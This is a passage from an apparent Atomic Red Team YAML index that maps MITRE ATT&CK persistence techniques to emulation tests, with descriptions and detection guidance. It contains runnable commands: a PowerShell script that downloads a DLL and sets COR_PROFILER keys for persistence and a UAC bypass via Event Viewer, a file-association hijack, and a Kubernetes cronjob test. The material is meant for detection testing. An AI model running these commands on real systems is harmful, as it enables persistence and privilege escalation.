+ + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unmanaged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan + New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null + Write-Host "executing eventvwr.msc" -ForegroundColor Cyan + START MMC.EXE EVENTVWR.MSC + cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\" + -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment + -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty + -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore + | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" + -Force -ErrorAction Ignore | Out-Null\n" + name: powershell 
+ - name: System Scope COR_PROFILER + auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 + description: | + Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. + The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity + level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will + still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. + + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unmanaged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + Write-Host "Creating system environment variables" -ForegroundColor Cyan + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null + New-ItemProperty -Path 
'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null + cleanup_command: | + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null + name: powershell + elevation_required: true + - name: Registry-free process scope COR_PROFILER + auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 + description: | + Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. 
+ + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unamanged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + $env:COR_ENABLE_PROFILING = 1 + $env:COR_PROFILER = '#{clsid_guid}' + $env:COR_PROFILER_PATH = '#{file_name}' + POWERSHELL -c 'Start-Sleep 1' + cleanup_command: | + $env:COR_ENABLE_PROFILING = 0 + $env:COR_PROFILER = '' + $env:COR_PROFILER_PATH = '' + name: powershell + T1546.001: + technique: + created: '2020-01-24T13:40:47.282Z' + modified: '2020-01-24T13:40:47.282Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c + description: "Adversaries may establish persistence by executing malicious content + triggered by a file type association. When a file is opened, the default program + used to open the file (also called the file association or handler) is checked. + File association selections are stored in the Windows Registry and can be + edited by users, administrators, or programs that have Registry access (Citation: + Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or + by administrators using the built-in assoc utility. 
(Citation: Microsoft Assoc + Oct 2017) Applications can modify the file association for a given file extension + to call an arbitrary program when a file with the given extension is opened.\n\nSystem + file associations are listed under HKEY_CLASSES_ROOT\\.[extension], + for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler + for that extension located at HKEY_CLASSES_ROOT\\[handler]. The + various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. + For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* + HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe + values of the keys listed are commands that are executed when the handler + opens the file extension. Adversaries can modify these values to continually + execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)" + name: Change Default File Association + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1546.001 + url: https://attack.mitre.org/techniques/T1546/001 + - external_id: CAPEC-556 + source_name: capec + url: https://capec.mitre.org/data/definitions/556.html + - url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs + description: Microsoft. (n.d.). Change which programs Windows 7 uses by default. + Retrieved July 26, 2016. + source_name: Microsoft Change Default Programs + - url: http://msdn.microsoft.com/en-us/library/bb166549.aspx + description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. + Retrieved November 13, 2014. + source_name: Microsoft File Handlers + - url: https://docs.microsoft.com/windows-server/administration/windows-commands/assoc + description: Plett, C. et al.. (2017, October 15). assoc. 
Retrieved August + 7, 2018. + source_name: Microsoft Assoc Oct 2017 + - url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd + description: Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August + 8, 2018. + source_name: TrendMicro TROJ-FAKEAV OCT 2012 + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + x_mitre_detection: |- + Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process. + + User file association preferences are stored under [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys. + + Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. + x_mitre_permissions_required: + - Administrator + - SYSTEM + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1546.001 + atomic_tests: + - name: Change Default File Association + auto_generated_guid: 10a08978-2045-4d62-8c42-1957bbbea102 + description: "Change Default File Association From cmd.exe of hta to notepad.\n\nUpon + successful execution, cmd.exe will change the file association of .hta to + notepad.exe. 
\n" + supported_platforms: + - windows + input_arguments: + target_extension_handler: + description: txtfile maps to notepad.exe + type: Path + default: txtfile + extension_to_change: + description: File Extension To Hijack + type: String + default: ".hta" + original_extension_handler: + description: File Extension To Revert + type: String + default: htafile + executor: + command: 'assoc #{extension_to_change}=#{target_extension_handler} + +' + cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} + +' + name: command_prompt + elevation_required: true + T1136.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1136.003 + url: https://attack.mitre.org/techniques/T1136/003 + - source_name: Microsoft O365 Admin Roles + url: https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide + description: Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et. + al.. (2019, October 8). About admin roles. Retrieved October 18, 2019. + - source_name: Microsoft Support O365 Add Another Admin, October 2019 + url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d + description: Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019. + - source_name: AWS Create IAM User + url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html + description: AWS. (n.d.). Creating an IAM User in Your AWS Account. Retrieved + January 29, 2020. + - source_name: GCP Create Cloud Identity Users + url: https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554 + description: Google. (n.d.). Create Cloud Identity user accounts. Retrieved + January 29, 2020. + - source_name: Microsoft Azure AD Users + url: https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory + description: Microsoft. (2019, November 11). Add or delete users using Azure + Active Directory. 
Retrieved January 30, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Cloud Account + description: |- + Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) + + Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection. + id: attack-pattern--a009cb25-4801-4116-9105-80a91cf15c1b + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-03-16T12:47:00.192Z' + created: '2020-01-29T17:32:30.711Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: Collect usage logs from cloud user and administrator accounts + to identify unusual activity in the creation of new accounts and assignment + of roles to those accounts. Monitor for accounts assigned to admin roles that + go over a certain threshold of known admins. + x_mitre_data_sources: + - 'User Account: User Account Creation' + x_mitre_contributors: + - Praetorian + - Microsoft Threat Intelligence Center (MSTIC) + x_mitre_platforms: + - Azure AD + - Office 365 + - IaaS + - Google Workspace + atomic_tests: [] + T1078.004: + technique: + id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 + description: |- + Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. 
Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) + + Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. + name: Cloud Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1078.004 + url: https://attack.mitre.org/techniques/T1078/004 + - source_name: AWS Identity Federation + url: https://aws.amazon.com/identity/federation/ + description: Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13, + 2020. + - source_name: Google Federating GC + url: https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction + description: Google. (n.d.). Federating Google Cloud with Active Directory. + Retrieved March 13, 2020. + - source_name: Microsoft Deploying AD Federation + url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs + description: Microsoft. (n.d.). Deploying Active Directory Federation Services + in Azure. Retrieved March 13, 2020. 
+ type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-03-16T12:45:15.399Z' + created: '2020-03-13T20:36:57.378Z' + x_mitre_platforms: + - Azure AD + - Office 365 + - SaaS + - IaaS + - Google Workspace + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal + or malicious behavior, such as accessing information outside of the normal + function of the account or account usage at atypical hours. + x_mitre_permissions_required: + - User + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.2' + atomic_tests: [] + T1542.002: + technique: + created: '2019-12-19T20:21:21.669Z' + modified: '2020-03-23T23:48:33.904Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--791481f8-e96a-41be-b089-a088763083d4 + description: |- + Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking. 
+ + Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks. + name: Component Firmware + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1542.002 + url: https://attack.mitre.org/techniques/T1542/002 + - description: SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology + (S.M.A.R.T.). Retrieved October 2, 2018. + source_name: SanDisk SMART + - url: https://www.smartmontools.org/ + description: smartmontools. (n.d.). smartmontools. Retrieved October 2, 2018. + source_name: SmartMontools + - url: https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html + description: Pinola, M. (2014, December 14). 3 tools to check your hard drive's + health and make sure it's not already dying on you. Retrieved October 2, + 2018. + source_name: ITWorld Hard Disk Health Dec 2014 + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - 'Driver: Driver Metadata' + - 'Firmware: Firmware Modification' + - 'Process: OS API Execution' + x_mitre_detection: |- + Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms. 
+ + Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images. + x_mitre_defense_bypassed: + - Anti-virus + - Host intrusion prevention systems + - File monitoring + x_mitre_permissions_required: + - SYSTEM + x_mitre_system_requirements: + - Ability to update component device firmware from the host operating system. + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1546.015: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.015 + url: https://attack.mitre.org/techniques/T1546/015 + - url: https://msdn.microsoft.com/library/ms694363.aspx + description: Microsoft. (n.d.). The Component Object Model. Retrieved August + 18, 2016. + source_name: Microsoft Component Object Model + - url: https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence + description: 'G DATA. (2014, October). COM Object hijacking: the discreet + way of persistence. Retrieved August 13, 2016.' + source_name: GDATA COM Hijacking + - source_name: Elastic COM Hijacking + description: 'Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting + Persistence & Evasion with the COM. Retrieved September 15, 2016.' + url: https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Component Object Model Hijacking + description: "Adversaries may establish persistence by executing malicious content + triggered by hijacked references to Component Object Model (COM) objects. 
+ COM is a system within Windows to enable interaction between software components + through the operating system.(Citation: Microsoft Component Object Model) + \ References to various COM objects are stored in the Registry. \n\nAdversaries + can use the COM system to insert malicious code that can be executed in place + of legitimate software through hijacking the COM references and relationships + as a means for persistence. Hijacking a COM object requires a change in the + Registry to replace a reference to a legitimate system component which may + cause that component to not work when executed. When that system component + is executed through normal system operation the adversary's code will be executed + instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects + that are used frequently enough to maintain a consistent level of persistence, + but are unlikely to break noticeable functionality within the system as to + avoid system instability that could lead to detection. " + id: attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-11-10T18:19:44.750Z' + created: '2020-03-16T14:12:47.923Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: "There are opportunities to detect COM hijacking by searching + for Registry references that have been replaced and through Registry operations + (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary + paths with unknown paths or otherwise malicious content. 
Even though some + third-party applications define user COM objects, the presence of objects + within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and + should be investigated since user objects will be loaded prior to machine + objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Elastic + COM Hijacking) Registry entries for existing COM objects may change infrequently. + When an entry with a known good path and binary is replaced or changed to + an unusual value to point to an unknown binary in a new location, then it + may indicate suspicious behavior and should be investigated. \n\nLikewise, + if software DLL loads are collected and analyzed, any unusual DLL load that + can be correlated with a COM object Registry modification may indicate COM + hijacking has been performed. " + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + x_mitre_contributors: + - Elastic + x_mitre_platforms: + - Windows + atomic_tests: [] + T1554: + technique: + created: '2020-02-11T18:18:34.279Z' + modified: '2020-03-27T14:49:58.249Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1554 + url: https://attack.mitre.org/techniques/T1554 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Compromise Client Software Binary + description: |- + Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers. 
+ + Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host. + id: attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5 + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_detection: "Collect and analyze signing certificate metadata and check + signature validity on software that executes within the environment. Look + for changes to client software that do not correlate with known software or + patch cycles. \n\nConsider monitoring for anomalous behavior from client applications, + such as atypical module loads, file reads/writes, or network connections." + x_mitre_data_sources: + - 'File: File Modification' + - 'File: File Creation' + - 'File: File Deletion' + - 'File: File Metadata' + x_mitre_contributors: + - CrowdStrike Falcon OverWatch + atomic_tests: [] + T1053.007: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.007 + url: https://attack.mitre.org/techniques/T1053/007 + - source_name: Kubernetes Jobs + url: https://kubernetes.io/docs/concepts/workloads/controllers/job/ + description: The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March + 30, 2021. + - source_name: Kubernetes CronJob + url: https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/ + description: The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved + March 29, 2021. + - source_name: Threat Matrix for Kubernetes + url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + description: Weizman, Y. (2020, April 2). 
Threat Matrix for Kubernetes. Retrieved + March 30, 2021. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Container Orchestration Job + description: |- + Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster. + + In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in the cluster.(Citation: Threat Matrix for Kubernetes) + id: attack-pattern--1126cab1-c700-412f-a510-61f4937bb096 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-12T18:09:46.821Z' + created: '2021-03-29T17:06:22.247Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: 'Monitor for the anomalous creation of scheduled jobs in + container orchestration environments. Use logging agents on Kubernetes nodes + and retrieve logs from sidecar proxies for application and resource pods to + monitor malicious container orchestration job deployments. 
' + x_mitre_contributors: + - Center for Threat-Informed Defense (CTID) + - Vishwas Manral, McAfee + - Yossi Weizman, Azure Defender Research Team + x_mitre_platforms: + - Containers + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Container: Container Creation' + - 'File: File Creation' + identifier: T1053.007 + atomic_tests: + - name: ListCronjobs + auto_generated_guid: ddfb0bc1-3c3f-47e9-a298-550ecfefacbd + description: 'Kubernetes Job is a controller that creates one or more pods and + ensures that a specified number of them successfully terminate. Kubernetes + Job can be used to run containers that perform finite tasks for batch jobs. + Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes + CronJob for scheduling execution of malicious code that would run as a container + in the cluster. + +' + supported_platforms: + - linux + - macos + input_arguments: + namespace: + description: K8s namespace to list + type: String + default: default + executor: + prereq_command: 'which kubectl + +' + command: 'kubectl get cronjobs -n #{namespace} + +' + name: bash + elevation_required: false + - name: CreateCronjob + auto_generated_guid: f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 + description: 'Kubernetes Job is a controller that creates one or more pods and + ensures that a specified number of them successfully terminate. Kubernetes + Job can be used to run containers that perform finite tasks for batch jobs. + Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes + CronJob for scheduling execution of malicious code that would run as a container + in the cluster. 
+ +' + supported_platforms: + - linux + - macos + input_arguments: + namespace: + description: K8s namespace to list + type: String + default: default + executor: + prereq_command: 'which kubectl + +' + command: 'kubectl create -f src/cronjob.yaml -n #{namespace} + +' + cleanup_command: 'kubectl delete cronjob art -n #{namespace} + +' + name: bash + elevation_required: false + T1136: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1136 + url: https://attack.mitre.org/techniques/T1136 + - source_name: Microsoft User Creation Event + description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account + was created. Retrieved June 30, 2017.' + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720 + description: |- + Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. + + Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection. 
+ name: Create Account + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-03-16T12:47:00.458Z' + created: '2017-12-14T16:46:06.044Z' + x_mitre_is_subtechnique: false + x_mitre_contributors: + - Microsoft Threat Intelligence Center (MSTIC) + - Praetorian + x_mitre_version: '2.2' + x_mitre_data_sources: + - 'User Account: User Account Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary. + + Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. + x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - IaaS + - Linux + - macOS + - Google Workspace + x_mitre_permissions_required: + - Administrator + atomic_tests: [] + T1543: + technique: + external_references: + - source_name: mitre-attack + external_id: T1543 + url: https://attack.mitre.org/techniques/T1543 + - url: https://technet.microsoft.com/en-us/library/cc772408.aspx + description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. + source_name: TechNet Services + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (n.d.). 
Creating Launch Daemons and Agents. Retrieved + July 10, 2017. + source_name: AppleDocs Launch Agent Daemons + - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf + description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical + OS X Malware Detection & Analysis. Retrieved July 10, 2017.' + source_name: OSX Malware Detection + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Create or Modify System Process + description: "Adversaries may create or modify system-level processes to repeatedly + execute malicious payloads as part of persistence. When operating systems + boot up, they can start processes that perform background system functions. + On Windows and Linux, these system processes are referred to as services. + (Citation: TechNet Services) On macOS, launchd processes known as [Launch + Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) + are run to finish system initialization and load user specific parameters.(Citation: + AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, + daemons, or agents that can be configured to execute at startup or a repeatable + interval in order to establish persistence. Similarly, adversaries may modify + existing services, daemons, or agents to achieve the same effect. \n\nServices, + daemons, or agents may be created with administrator privileges but executed + under root/SYSTEM privileges. Adversaries may leverage this functionality + to create or modify system processes in order to escalate privileges. (Citation: + OSX Malware Detection). 
